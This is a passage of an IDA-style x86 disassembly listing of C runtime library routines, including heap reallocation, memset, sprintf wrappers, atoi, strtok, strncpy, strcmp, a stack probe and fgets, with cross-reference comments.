jmp short loc_41E31D
; ---------------------------------------------------------------------------
loc_41E31A: ; CODE XREF: sub_41E2D9+C5�j
mov ecx, [ebp+arg_0]
loc_41E31D: ; CODE XREF: sub_41E2D9+36�j
; sub_41E2D9+3F�j
test word ptr [esi+0Ch], 10Ch
jz short loc_41E34F
mov eax, [esi+4]
test eax, eax
jz short loc_41E34F
cmp ecx, eax
mov edi, ecx
jb short loc_41E334
mov edi, eax
loc_41E334: ; CODE XREF: sub_41E2D9+57�j
push edi
push dword ptr [esi]
push ebx
call sub_41F400
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_8]
jmp short loc_41E39A
; ---------------------------------------------------------------------------
loc_41E34F: ; CODE XREF: sub_41E2D9+4A�j
; sub_41E2D9+51�j
cmp ecx, [ebp+var_4]
jb short loc_41E382
cmp [ebp+var_4], 0
mov eax, ecx
jz short loc_41E365
xor edx, edx
div [ebp+var_4]
mov eax, ecx
sub eax, edx
loc_41E365: ; CODE XREF: sub_41E2D9+81�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_421D41
add esp, 0Ch
test eax, eax
jz short loc_41E3AC
cmp eax, 0FFFFFFFFh
jz short loc_41E3BC
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_41E39A
; ---------------------------------------------------------------------------
loc_41E382: ; CODE XREF: sub_41E2D9+79�j
push esi
call sub_421C63
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41E3B0
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+var_4], eax
loc_41E39A: ; CODE XREF: sub_41E2D9+74�j
; sub_41E2D9+A7�j
cmp [ebp+arg_0], 0
jnz loc_41E31A
mov eax, [ebp+arg_8]
loc_41E3A7: ; CODE XREF: sub_41E2D9+E1�j
pop esi
loc_41E3A8: ; CODE XREF: sub_41E2D9+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41E3AC: ; CODE XREF: sub_41E2D9+9B�j
or dword ptr [esi+0Ch], 10h
loc_41E3B0: ; CODE XREF: sub_41E2D9+B3�j
; sub_41E2D9+E7�j
mov eax, edi
sub eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
jmp short loc_41E3A7
; ---------------------------------------------------------------------------
loc_41E3BC: ; CODE XREF: sub_41E2D9+A0�j
or dword ptr [esi+0Ch], 20h
jmp short loc_41E3B0
sub_41E2D9 endp
; =============== S U B R O U T I N E =======================================
sub_41E3C2 proc near ; CODE XREF: sub_42319B+34�p
; sub_42319B+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
test ebx, ebx
push ebp
push edi
jnz short loc_41E3DC
push [esp+0Ch+arg_4]
call sub_41E5D3
pop ecx
jmp loc_41E520
; ---------------------------------------------------------------------------
loc_41E3DC: ; CODE XREF: sub_41E3C2+9�j
push esi
mov esi, [esp+10h+arg_4]
test esi, esi
jnz short loc_41E3F1
push ebx
call sub_41E2A1
pop ecx
jmp loc_41E51D
; ---------------------------------------------------------------------------
loc_41E3F1: ; CODE XREF: sub_41E3C2+21�j
cmp ds:dword_4E2F00, 3
jnz loc_41E4E9
loc_41E3FE: ; CODE XREF: sub_41E3C2+11B�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41E4CB
push ebx
call sub_421188
mov ebp, eax
test ebp, ebp
pop ecx
jz loc_41E4AA
cmp esi, ds:dword_4E2EEC
ja short loc_41E46A
push esi
push ebx
push ebp
call sub_421688
add esp, 0Ch
test eax, eax
jz short loc_41E435
mov edi, ebx
jmp short loc_41E466
; ---------------------------------------------------------------------------
loc_41E435: ; CODE XREF: sub_41E3C2+6D�j
push esi
call sub_421967
mov edi, eax
test edi, edi
pop ecx
jz short loc_41E46A
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_41E44C
mov eax, esi
loc_41E44C: ; CODE XREF: sub_41E3C2+86�j
push eax
push ebx
push edi
call sub_41F400
push ebx
call sub_421188
mov ebp, eax
push ebx
push ebp
call sub_4211B3
add esp, 18h
loc_41E466: ; CODE XREF: sub_41E3C2+71�j
test edi, edi
jnz short loc_41E4A6
loc_41E46A: ; CODE XREF: sub_41E3C2+5E�j
; sub_41E3C2+7E�j
test esi, esi
jnz short loc_41E46F
inc esi
loc_41E46F: ; CODE XREF: sub_41E3C2+AA�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push ds:dword_4E2EFC
call ds:dword_42B0E4 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_41E4A6
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_41E494
mov eax, esi
loc_41E494: ; CODE XREF: sub_41E3C2+CE�j
push eax
push ebx
push edi
call sub_41F400
push ebx
push ebp
call sub_4211B3
add esp, 14h
loc_41E4A6: ; CODE XREF: sub_41E3C2+A6�j
; sub_41E3C2+C6�j
test ebp, ebp
jnz short loc_41E4C7
loc_41E4AA: ; CODE XREF: sub_41E3C2+52�j
test esi, esi
jnz short loc_41E4AF
inc esi
loc_41E4AF: ; CODE XREF: sub_41E3C2+EA�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push ebx
push 0
push ds:dword_4E2EFC
call ds:dword_42B194 ; RtlReAllocateHeap
mov edi, eax
loc_41E4C7: ; CODE XREF: sub_41E3C2+E6�j
test edi, edi
jnz short loc_41E4E5
loc_41E4CB: ; CODE XREF: sub_41E3C2+41�j
cmp ds:dword_4E2964, 0
jz short loc_41E4E5
push esi
call sub_421F2F
test eax, eax
pop ecx
jnz loc_41E3FE
jmp short loc_41E51D
; ---------------------------------------------------------------------------
loc_41E4E5: ; CODE XREF: sub_41E3C2+107�j
; sub_41E3C2+110�j
mov eax, edi
jmp short loc_41E51F
; ---------------------------------------------------------------------------
loc_41E4E9: ; CODE XREF: sub_41E3C2+36�j
; sub_41E3C2+159�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_41E509
test esi, esi
jnz short loc_41E4F5
inc esi
loc_41E4F5: ; CODE XREF: sub_41E3C2+130�j
push esi
push ebx
push 0
push ds:dword_4E2EFC
call ds:dword_42B194 ; RtlReAllocateHeap
test eax, eax
jnz short loc_41E51F
loc_41E509: ; CODE XREF: sub_41E3C2+12C�j
cmp ds:dword_4E2964, 0
jz short loc_41E51F
push esi
call sub_421F2F
test eax, eax
pop ecx
jnz short loc_41E4E9
loc_41E51D: ; CODE XREF: sub_41E3C2+2A�j
; sub_41E3C2+121�j
xor eax, eax
loc_41E51F: ; CODE XREF: sub_41E3C2+125�j
; sub_41E3C2+145�j ...
pop esi
loc_41E520: ; CODE XREF: sub_41E3C2+15�j
pop edi
pop ebp
pop ebx
retn
sub_41E3C2 endp
; =============== S U B R O U T I N E =======================================
sub_41E524 proc near ; CODE XREF: sub_41E54E+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_4220B2
test eax, eax
jnz short loc_41E538
mov ds:dword_4E28F4, 18h
retn
; ---------------------------------------------------------------------------
loc_41E538: ; CODE XREF: sub_41E524+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_421F4A
add esp, 10h
retn
sub_41E524 endp
; =============== S U B R O U T I N E =======================================
sub_41E54E proc near ; CODE XREF: sub_40274D+55D0�p
; sub_40274D+716A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41E524
add esp, 0Ch
retn
sub_41E54E endp
; =============== S U B R O U T I N E =======================================
sub_41E561 proc near ; CODE XREF: sub_41E5A7+B�p
arg_0 = dword ptr 4
cmp ds:dword_4E2F00, 3
push esi
mov esi, [esp+4+arg_0]
jnz short loc_41E582
cmp esi, ds:dword_4E2EEC
ja short loc_41E582
push esi
call sub_421967
test eax, eax
pop ecx
jnz short loc_41E5A5
loc_41E582: ; CODE XREF: sub_41E561+C�j
; sub_41E561+14�j
test esi, esi
jnz short loc_41E587
inc esi
loc_41E587: ; CODE XREF: sub_41E561+23�j
cmp ds:dword_4E2F00, 1
jz short loc_41E596
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_41E596: ; CODE XREF: sub_41E561+2D�j
push esi
push 0
push ds:dword_4E2EFC
call ds:dword_42B0E4 ; RtlAllocateHeap
loc_41E5A5: ; CODE XREF: sub_41E561+1F�j
pop esi
retn
sub_41E561 endp
; =============== S U B R O U T I N E =======================================
sub_41E5A7 proc near ; CODE XREF: sub_41E5D3+A�p
; sub_41FEB2+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_41E5D0
loc_41E5AE: ; CODE XREF: sub_41E5A7+27�j
push [esp+arg_0]
call sub_41E561
test eax, eax
pop ecx
jnz short locret_41E5D2
cmp [esp+arg_4], eax
jz short locret_41E5D2
push [esp+arg_0]
call sub_421F2F
test eax, eax
pop ecx
jnz short loc_41E5AE
loc_41E5D0: ; CODE XREF: sub_41E5A7+5�j
xor eax, eax
locret_41E5D2: ; CODE XREF: sub_41E5A7+13�j
; sub_41E5A7+19�j
retn
sub_41E5A7 endp
; =============== S U B R O U T I N E =======================================
sub_41E5D3 proc near ; CODE XREF: sub_4022F5+5E�p
; sub_40AE18+32�p ...
arg_0 = dword ptr 4
push ds:dword_4E2964
push [esp+4+arg_0]
call sub_41E5A7
pop ecx
pop ecx
retn
sub_41E5D3 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_41E5F0 proc near ; CODE XREF: seg000:0040114B�p
; seg000:00401159�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_41E64B
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_41E63B
neg ecx
and ecx, 3
jz short loc_41E61D
sub edx, ecx
loc_41E613: ; CODE XREF: sub_41E5F0+2B�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_41E613
loc_41E61D: ; CODE XREF: sub_41E5F0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_41E63B
rep stosd
test edx, edx
jz short loc_41E645
loc_41E63B: ; CODE XREF: sub_41E5F0+18�j
; sub_41E5F0+43�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_41E63B
loc_41E645: ; CODE XREF: sub_41E5F0+49�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41E64B: ; CODE XREF: sub_41E5F0+A�j
mov eax, [esp+arg_0]
retn
sub_41E5F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E650 proc near ; CODE XREF: sub_4011F5+1C�p
; sub_417DE4+19�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_C]
mov [ebp+var_1C], eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_4222C8
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_41E6A0
dec [ebp+var_1C]
js short loc_41E693
mov eax, [ebp+var_20]
mov byte ptr [eax], 0
jmp short loc_41E6A0
; ---------------------------------------------------------------------------
loc_41E693: ; CODE XREF: sub_41E650+39�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_422124
pop ecx
pop ecx
loc_41E6A0: ; CODE XREF: sub_41E650+34�j
; sub_41E650+41�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_41E650 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6A6 proc near ; CODE XREF: sub_40123B+5E�p
; sub_401F92+2E�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_4222C8
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_41E6F8
dec [ebp+var_1C]
js short loc_41E6EB
mov eax, [ebp+var_20]
mov byte ptr [eax], 0
jmp short loc_41E6F8
; ---------------------------------------------------------------------------
loc_41E6EB: ; CODE XREF: sub_41E6A6+3B�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_422124
pop ecx
pop ecx
loc_41E6F8: ; CODE XREF: sub_41E6A6+36�j
; sub_41E6A6+43�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_41E6A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6FE proc near ; CODE XREF: sub_40123B+42�p
; sub_40274D+1A89�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_1C], eax
push edi
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_4222C8
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_41E74F
dec [ebp+var_1C]
js short loc_41E742
mov eax, [ebp+var_20]
mov byte ptr [eax], 0
jmp short loc_41E74F
; ---------------------------------------------------------------------------
loc_41E742: ; CODE XREF: sub_41E6FE+3A�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_422124
pop ecx
pop ecx
loc_41E74F: ; CODE XREF: sub_41E6FE+35�j
; sub_41E6FE+42�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_41E6FE endp
; =============== S U B R O U T I N E =======================================
sub_41E755 proc near ; CODE XREF: sub_41E7AD�j
; sub_4282DB+33�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
jmp short loc_41E75D
; ---------------------------------------------------------------------------
loc_41E75C: ; CODE XREF: sub_41E755+14�j
inc esi
loc_41E75D: ; CODE XREF: sub_41E755+5�j
movzx eax, byte ptr [esi]
push eax
call sub_422AC2
test eax, eax
pop ecx
jnz short loc_41E75C
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, 2Dh
mov edx, ecx
jz short loc_41E77B
cmp ecx, 2Bh
jnz short loc_41E77F
loc_41E77B: ; CODE XREF: sub_41E755+1F�j
movzx ecx, byte ptr [esi]
inc esi
loc_41E77F: ; CODE XREF: sub_41E755+24�j
xor eax, eax
loc_41E781: ; CODE XREF: sub_41E755+4D�j
cmp ecx, 30h
jl short loc_41E790
cmp ecx, 39h
jg short loc_41E790
sub ecx, 30h
jmp short loc_41E793
; ---------------------------------------------------------------------------
loc_41E790: ; CODE XREF: sub_41E755+2F�j
; sub_41E755+34�j
or ecx, 0FFFFFFFFh
loc_41E793: ; CODE XREF: sub_41E755+39�j
cmp ecx, 0FFFFFFFFh
jz short loc_41E7A4
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2]
movzx ecx, byte ptr [esi]
inc esi
jmp short loc_41E781
; ---------------------------------------------------------------------------
loc_41E7A4: ; CODE XREF: sub_41E755+41�j
cmp edx, 2Dh
pop esi
jnz short locret_41E7AC
neg eax
locret_41E7AC: ; CODE XREF: sub_41E755+53�j
retn
sub_41E755 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E7AD proc near ; CODE XREF: sub_40274D+680�p
; sub_40274D+8BD�p ...
jmp sub_41E755
sub_41E7AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E7B2 proc near ; CODE XREF: sub_40274D+B6�p
; sub_40274D+C6�p ...
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
mov eax, ds:dword_4437D4
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
pop ecx
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_41E7D3: ; CODE XREF: sub_41E7B2+3A�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_41E7D3
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_41E802
mov edx, ds:dword_4E28F0
jmp short loc_41E802
; ---------------------------------------------------------------------------
loc_41E7FD: ; CODE XREF: sub_41E7B2+67�j
test al, al
jz short loc_41E81B
inc edx
loc_41E802: ; CODE XREF: sub_41E7B2+41�j
; sub_41E7B2+49�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_41E7FD
loc_41E81B: ; CODE XREF: sub_41E7B2+4D�j
mov ebx, edx
jmp short loc_41E837
; ---------------------------------------------------------------------------
loc_41E81F: ; CODE XREF: sub_41E7B2+88�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_41E83E
inc edx
loc_41E837: ; CODE XREF: sub_41E7B2+6B�j
cmp byte ptr [edx], 0
jnz short loc_41E81F
jmp short loc_41E842
; ---------------------------------------------------------------------------
loc_41E83E: ; CODE XREF: sub_41E7B2+82�j
mov byte ptr [edx], 0
inc edx
loc_41E842: ; CODE XREF: sub_41E7B2+8A�j
mov ecx, [ebp+var_4]
mov eax, ebx
sub eax, edx
neg eax
pop edi
sbb eax, eax
and eax, ebx
pop esi
mov ds:dword_4E28F0, edx
pop ebx
call sub_422B83
leave
retn
sub_41E7B2 endp
; ---------------------------------------------------------------------------
db 0CCh
; =============== S U B R O U T I N E =======================================
sub_41E860 proc near ; CODE XREF: sub_4025EF+64�p
; sub_40274D+48�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_41E8FF
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_41E88C
shr ecx, 2
jnz loc_41E90F
jmp short loc_41E8B3
; ---------------------------------------------------------------------------
loc_41E88C: ; CODE XREF: sub_41E860+1F�j
; sub_41E860+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_41E8C6
test al, al
jz short loc_41E8CE
test esi, 3
jnz short loc_41E88C
mov ebx, ecx
shr ecx, 2
jnz short loc_41E90F
loc_41E8AE: ; CODE XREF: sub_41E860+AD�j
and ebx, 3
jz short loc_41E8C6
loc_41E8B3: ; CODE XREF: sub_41E860+2A�j
; sub_41E860+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_41E8F8
sub ebx, 1
jnz short loc_41E8B3
loc_41E8C6: ; CODE XREF: sub_41E860+39�j
; sub_41E860+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41E8CE: ; CODE XREF: sub_41E860+3D�j
test edi, 3
jz short loc_41E8EC
loc_41E8D6: ; CODE XREF: sub_41E860+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_41E97C
test edi, 3
jnz short loc_41E8D6
loc_41E8EC: ; CODE XREF: sub_41E860+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_41E967
loc_41E8F3: ; CODE XREF: sub_41E860+9B�j
; sub_41E860+116�j
mov [edi], al
add edi, 1
loc_41E8F8: ; CODE XREF: sub_41E860+5F�j
sub ebx, 1
jnz short loc_41E8F3
pop ebx
pop esi
loc_41E8FF: ; CODE XREF: sub_41E860+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41E905: ; CODE XREF: sub_41E860+C7�j
; sub_41E860+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_41E8AE
loc_41E90F: ; CODE XREF: sub_41E860+24�j
; sub_41E860+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_41E905
test dl, dl
jz short loc_41E959
test dh, dh
jz short loc_41E94F
test edx, 0FF0000h
jz short loc_41E945
test edx, 0FF000000h
jnz short loc_41E905
mov [edi], edx
jmp short loc_41E95D
; ---------------------------------------------------------------------------
loc_41E945: ; CODE XREF: sub_41E860+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_41E95D
; ---------------------------------------------------------------------------
loc_41E94F: ; CODE XREF: sub_41E860+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_41E95D
; ---------------------------------------------------------------------------
loc_41E959: ; CODE XREF: sub_41E860+CB�j
xor edx, edx
mov [edi], edx
loc_41E95D: ; CODE XREF: sub_41E860+E3�j
; sub_41E860+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_41E973
loc_41E967: ; CODE XREF: sub_41E860+91�j
xor eax, eax
loc_41E969: ; CODE XREF: sub_41E860+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_41E969
loc_41E973: ; CODE XREF: sub_41E860+105�j
and ebx, 3
jnz loc_41E8F3
loc_41E97C: ; CODE XREF: sub_41E860+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_41E860 endp
; ---------------------------------------------------------------------------
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_41E990 proc near ; CODE XREF: sub_40274D+18F�p
; sub_40274D+1DE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41E9DC
loc_41E9A0: ; CODE XREF: sub_41E990+3C�j
; sub_41E990+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41E9D4
or al, al
jz short loc_41E9D0
cmp ah, [ecx+1]
jnz short loc_41E9D4
or ah, ah
jz short loc_41E9D0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41E9D4
or al, al
jz short loc_41E9D0
cmp ah, [ecx+3]
jnz short loc_41E9D4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41E9A0
mov edi, edi
loc_41E9D0: ; CODE XREF: sub_41E990+18�j
; sub_41E990+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
loc_41E9D4: ; CODE XREF: sub_41E990+14�j
; sub_41E990+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_41E9DC: ; CODE XREF: sub_41E990+E�j
test edx, 1
jz short loc_41E9FC
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_41E9D4
add ecx, 1
or al, al
jz short loc_41E9D0
test edx, 2
jz short loc_41E9A0
loc_41E9FC: ; CODE XREF: sub_41E990+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41E9D4
or al, al
jz short loc_41E9D0
cmp ah, [ecx+1]
jnz short loc_41E9D4
or ah, ah
jz short loc_41E9D0
add ecx, 2
jmp short loc_41E9A0
sub_41E990 endp
; ---------------------------------------------------------------------------
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_41EA20 proc near ; CODE XREF: sub_402472+A�p
; sub_40274D+A�p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_41EA35
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_41EA35: ; CODE XREF: sub_41EA20+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_41EA3A: ; CODE XREF: sub_41EA20+2C�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_41EA3A
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_41EA20 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA5D proc near ; CODE XREF: sub_40274D+7185�p
; sub_40274D+71AF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_41EA71
xor eax, eax
jmp short loc_41EAA7
; ---------------------------------------------------------------------------
loc_41EA71: ; CODE XREF: sub_41EA5D+E�j
dec [ebp+arg_4]
push esi
jz short loc_41EAA1
mov esi, [ebp+arg_8]
loc_41EA7A: ; CODE XREF: sub_41EA5D+42�j
dec dword ptr [esi+4]
js short loc_41EA89
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41EA90
; ---------------------------------------------------------------------------
loc_41EA89: ; CODE XREF: sub_41EA5D+20�j
push esi
call sub_421C63
pop ecx
loc_41EA90: ; CODE XREF: sub_41EA5D+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_41EAAB
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_41EAA1
dec [ebp+arg_4]
jnz short loc_41EA7A
loc_41EAA1: ; CODE XREF: sub_41EA5D+18�j
; sub_41EA5D+3D�j ...
mov byte ptr [edi], 0
loc_41EAA4: ; CODE XREF: sub_41EA5D+55�j
mov eax, ebx
pop esi
loc_41EAA7: ; CODE XREF: sub_41EA5D+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41EAAB: ; CODE XREF: sub_41EA5D+36�j
cmp edi, [ebp+arg_0]
jnz short loc_41EAA1
xor ebx, ebx
jmp short loc_41EAA4
sub_41EA5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EAB4 proc near ; CODE XREF: sub_41EC61+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
mov esi, [ebp+arg_0]
mov bl, [esi]
push edi
lea edi, [esi+1]
loc_41EAC7: ; CODE XREF: sub_41EAB4+3F�j
cmp ds:dword_4437B0, 1
movzx eax, bl
jle short loc_41EADF
push 8
push eax
call sub_422B91
pop ecx
pop ecx
jmp short loc_41EAEC
; ---------------------------------------------------------------------------
loc_41EADF: ; CODE XREF: sub_41EAB4+1D�j
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
loc_41EAEC: ; CODE XREF: sub_41EAB4+29�j
test eax, eax
jz short loc_41EAF5
mov bl, [edi]
inc edi
jmp short loc_41EAC7
; ---------------------------------------------------------------------------
loc_41EAF5: ; CODE XREF: sub_41EAB4+3A�j
cmp bl, 2Dh
jnz short loc_41EB00
or [ebp+arg_C], 2
jmp short loc_41EB05
; ---------------------------------------------------------------------------
loc_41EB00: ; CODE XREF: sub_41EAB4+44�j
cmp bl, 2Bh
jnz short loc_41EB08
loc_41EB05: ; CODE XREF: sub_41EAB4+4A�j
mov bl, [edi]
inc edi
loc_41EB08: ; CODE XREF: sub_41EAB4+4F�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_41EC51
cmp eax, 1
jz loc_41EC51
cmp eax, 24h
jg loc_41EC51
test eax, eax
push 10h
pop ecx
jnz short loc_41EB50
cmp bl, 30h
jz short loc_41EB3A
mov [ebp+arg_8], 0Ah
jmp short loc_41EB68
; ---------------------------------------------------------------------------
loc_41EB3A: ; CODE XREF: sub_41EAB4+7B�j
mov al, [edi]
cmp al, 78h
jz short loc_41EB4D
cmp al, 58h
jz short loc_41EB4D
mov [ebp+arg_8], 8
jmp short loc_41EB68
; ---------------------------------------------------------------------------
loc_41EB4D: ; CODE XREF: sub_41EAB4+8A�j
; sub_41EAB4+8E�j
mov [ebp+arg_8], ecx
loc_41EB50: ; CODE XREF: sub_41EAB4+76�j
cmp [ebp+arg_8], ecx
jnz short loc_41EB68
cmp bl, 30h
jnz short loc_41EB68
mov al, [edi]
cmp al, 78h
jz short loc_41EB64
cmp al, 58h
jnz short loc_41EB68
loc_41EB64: ; CODE XREF: sub_41EAB4+AA�j
inc edi
mov bl, [edi]
inc edi
loc_41EB68: ; CODE XREF: sub_41EAB4+84�j
